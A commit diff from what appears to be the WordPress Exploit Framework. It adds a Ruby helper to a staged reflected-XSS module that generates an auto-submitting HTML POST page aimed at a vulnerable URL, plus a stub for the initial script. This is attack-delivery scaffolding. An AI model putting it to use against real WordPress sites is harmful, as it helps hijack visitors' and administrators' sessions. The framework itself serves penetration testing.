Add #create_basic_post_script and stub for #initial_script

rastating · rastating · commit 9c397dcbc431 · 2016-08-13T23:32:20.000+01:00
diff --git a/lib/wpxf/wordpress/staged_reflected_xss.rb b/lib/wpxf/wordpress/staged_reflected_xss.rb
@@ -32,10 +32,39 @@ def url_with_xss
     normalize_uri(xss_url, initial_req_path)
   end
 
+  # @return [String] the initial script that should be served to automate a form submission to the vulnerable page.
+  def initial_script
+    nil
+  end
+
+  # Create a basic POST script with the specified fields. All values in the script will be wrapped in double quotes.
+  # @param url [String] the vulnerable URL.
+  # @param fields [Hash] the fields and values to inject into the script.
+  def create_basic_post_script(url, fields)
+    json = ''
+    fields.each_with_index do |(k, v), i|
+      if i < fields.size - 1
+        json += "\"#{k}\": \"#{v}\",\n"
+        next
+      end
+
+      json += "\"#{k}\": \"#{v}\"\n"
+    end
+
+    %|
+      <html><head></head><body><script>
+        #{js_post}
+        post('#{url}', {
+          #{json}
+        });
+      </script></body></html>
+    |
+  end
+
   # Run the module.
   # @return [Boolean] true if successful.
   def run
-    unless respond_to? 'initial_script'
+    if initial_script.nil?
       raise 'Required method "initial_script" has not been implemented'
     end
 
